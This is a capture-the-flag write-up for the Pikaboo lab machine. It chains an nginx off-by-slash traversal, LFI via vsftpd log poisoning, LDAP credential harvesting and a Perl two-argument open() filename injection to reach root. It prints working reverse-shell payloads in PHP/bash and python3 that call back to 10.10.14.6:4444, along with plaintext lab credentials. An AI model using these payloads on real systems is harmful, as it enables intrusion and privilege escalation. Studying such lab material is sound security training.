Basic information

Port scan

Ports 21, 22 and 80 are open:

$ nmap -sC -sV 10.10.10.249

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 14:00 CST
Nmap scan report for 10.10.10.249
Host is up (0.070s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
| 256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_ 256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.47 seconds

Port 80

Directory scan

Clicking through to admin, the response shows that the real service listens on port 81 and nginx reverse-proxies to it:

nginx is misconfigured so that `/admin../` is accepted (the well-known off-by-slash: presumably a `location /admin` prefix without a trailing slash, so the dotted segment `admin..` survives prefix matching and is forwarded to the backend as `/../`), which gives directory traversal into the port-81 site:

Use this trick to scan for directories:

gobuster dir -u http://10.10.10.249/admin../ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/.htpasswd (Status: 403) [Size: 274]
/.hta (Status: 403) [Size: 274]
/.htaccess (Status: 403) [Size: 274]
/admin (Status: 401) [Size: 456]
/javascript (Status: 301) [Size: 314] [--> http://127.0.0.1:81/javascript/]
/server-status (Status: 200) [Size: 3897]

admin_staging

Using the path found in /server-status, access admin_staging the same way (through `/admin../`):
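To make the traversal concrete, the following added example (not part of the original writeup, and not the box's real nginx.conf) models how nginx's prefix matching and `proxy_pass` URI replacement turn `/admin../admin_staging/` into `/admin_staging/` on the port-81 backend. The two config dicts are assumptions chosen to reproduce the observed behaviour; the "fixed" one only adds the trailing slash to the location.

```python
"""Model of the nginx off-by-slash (/admin../) behaviour seen above.

Added example, not the box's nginx.conf: both config dicts are assumptions
that reproduce the observed behaviour (/admin proxied to Apache on :81).
"""
import posixpath

# Assumed vulnerable config:  location /admin  { proxy_pass http://127.0.0.1:81/; }
VULNERABLE = {"location": "/admin", "proxy_pass": "http://127.0.0.1:81/"}
# Assumed fix: trailing slash on the location, so "/admin.." no longer matches
FIXED = {"location": "/admin/", "proxy_pass": "http://127.0.0.1:81/"}


def upstream_uri(cfg, request_uri):
    """URI nginx forwards to the backend, or None if the location does not match.

    nginx resolves "." and ".." segments of the request *before* matching, but
    "admin.." is a single segment, so "/admin../x" survives untouched and still
    starts with the prefix "/admin".  Because proxy_pass carries a URI part
    ("/"), nginx then replaces the matched prefix with that part, verbatim.
    """
    if not request_uri.startswith(cfg["location"]):
        return None
    _, _, host_and_path = cfg["proxy_pass"].partition("://")
    _, _, pass_path = host_and_path.partition("/")
    return "/" + pass_path + request_uri[len(cfg["location"]):]


def backend_path(cfg, request_uri):
    """Path the Apache backend actually serves after normalising the forwarded URI."""
    forwarded = upstream_uri(cfg, request_uri)
    if forwarded is None:
        return None
    while "//" in forwarded:                       # Apache merges repeated slashes
        forwarded = forwarded.replace("//", "/")
    path = posixpath.normpath(forwarded)           # "/../admin_staging/" -> "/admin_staging"
    if forwarded.endswith("/") and not path.endswith("/"):
        path += "/"                                # keep the trailing slash
    return path


if __name__ == "__main__":
    for cfg_name, cfg in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        for uri in ("/admin/", "/admin../admin_staging/", "/admin../server-status"):
            print(f"{cfg_name:10} {uri:28} -> {backend_path(cfg, uri)}")
```

With the vulnerable prefix, `/admin../server-status` lands on the backend's `/server-status`, which is exactly what the gobuster run above hit; with the trailing slash, `/admin../` no longer matches the location at all.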

LFI

Judging by the format of the page parameter, an LFI is likely; fuzzing confirms that several log files can be included:

LFI to RCE

Given what is available (vsftpd plus an LFI), a search turns up vsftpd log poisoning:

Connect to FTP and log in with PHP code as the username (the standard vsftpd log-poisoning approach); the failed login is written to the vsftpd log, and including that log through the web app executes the PHP:

<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.6/4444 0>&1'"); ?>

http://10.10.10.249/admin../admin_staging/index.php?page=%2fvar%2flog%2fvsftpd%2elog

user flag

www-data can read user.txt in pwnmeow's home directory:

Information gathering

ldap

Checking listening ports shows 389 on localhost, i.e. LDAP:

config

The LDAP bind credentials can be read from /opt/pokeapi/config/settings.py:

DATABASES = {
"ldap": {
"ENGINE": "ldapdb.backends.ldap",
"NAME": "ldap:///",
"USER": "cn=binduser,ou=users,dc=pikaboo,dc=htb",
"PASSWORD": "J~42%W?PFHl]g",
},
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "/opt/pokeapi/db.sqlite3",
}
}

LDAP

With these credentials we can query LDAP (from the box, since 389 is local only) for more information:

ldapsearch -D "cn=binduser,ou=users,dc=pikaboo,dc=htb" -w 'J~42%W?PFHl]g' -b 'dc=pikaboo,dc=htb' -LLL -h 127.0.0.1 -p 389 -s sub "(objectClass=*)"

dn: uid=pwnmeow,ou=users,dc=ftp,dc=pikaboo,dc=htb
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: pwnmeow
cn: Pwn
sn: Meow
loginShell: /bin/bash
uidNumber: 10000
gidNumber: 10000
homeDirectory: /home/pwnmeow
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==

pwnmeow

LDAP gives us pwnmeow's password (the double colon in `userPassword::` means the LDIF value is base64-encoded). It does not work for SSH, but it does for FTP:

echo X0cwdFQ0X0M0dGNIXyczbV80bEwhXw== | base64 -d
_G0tT4_C4tcH_'3m_4lL!_
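Rather than decoding attributes one at a time, the following added example (not from the writeup) parses ldapsearch's LDIF output, unfolds wrapped lines, decodes `::` base64 values and lists every `userPassword` it finds. The sample LDIF is the pwnmeow entry above; the hashed-value check is an addition, since directories normally store `{SSHA}`-style hashes rather than the clear text seen on this box.

```python
"""Added example (not from the writeup): parse ldapsearch LDIF and decode '::' values.

The sample LDIF is the writeup's pwnmeow entry; everything else is constructed.
"""
import base64

# Constructed from the writeup's ldapsearch output (entries are separated by blank lines).
SAMPLE_LDIF = """\
dn: uid=pwnmeow,ou=users,dc=ftp,dc=pikaboo,dc=htb
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: pwnmeow
cn: Pwn
sn: Meow
loginShell: /bin/bash
uidNumber: 10000
gidNumber: 10000
homeDirectory: /home/pwnmeow
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==
"""


def unfold(text):
    """LDIF wraps long values; a continuation line starts with a single space."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return a list of entries, each a dict attr -> [values].

    'attr: value'  plain (safe-string) value
    'attr:: value' base64, used for binary data or any value with characters
                   outside the safe set (here, the quote in the password)
    'attr:< url'   URL reference, kept verbatim
    """
    entries, entry = [], {}
    for line in unfold(text):
        if line.startswith("#"):
            continue
        if not line.strip():
            if entry:
                entries.append(entry)
                entry = {}
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        elif rest.startswith("<"):
            value = rest[1:].strip()
        else:
            value = rest.strip()
        entry.setdefault(attr, []).append(value)
    if entry:
        entries.append(entry)
    return entries


def credentials(entries):
    """(uid, secret, is_hashed) for every entry carrying a userPassword.

    A '{scheme}' prefix ({SSHA}, {CRYPT}, ...) marks a hash to crack offline;
    a value without one, as on this box, is the clear-text password.
    """
    found = []
    for e in entries:
        for secret in e.get("userPassword", []):
            uid = e.get("uid", ["?"])[0]
            found.append((uid, secret, secret.startswith("{")))
    return found


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LDIF
    for uid, secret, hashed in credentials(parse_ldif(text)):
        print(f"{uid}: {secret}{'  (hashed)' if hashed else ''}")
```

Pipe the full `ldapsearch ... -LLL` output into the script to get every account's secret in one pass instead of spotting `::` lines by eye.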

Privilege escalation

The crontab shows root periodically running csvupdate over the directories under the FTP root:

/usr/local/bin/csvupdate

Inspecting this file shows a Perl script that opens each csv with the two-argument form of open(). Searching on that turns up the well-known issue: two-argument open() treats a filename beginning with `|` as a command to pipe into (and one ending with `|` as a command to read from):

So we can create a csv whose file name is the malicious command, and the cron job will execute it as root.

exploit & root flag

Create a csv with the malicious file name, upload it via FTP, wait for the cron job to run, and catch a root shell:

# A leading '|' makes Perl's two-argument open() run the rest as a command;
# ';echo .csv' keeps the name ending in .csv. A file name cannot contain '/',
# which is why the payload uses python3 sockets and a bare "sh" instead of
# /bin/bash and /dev/tcp.
touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.6\", 4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"
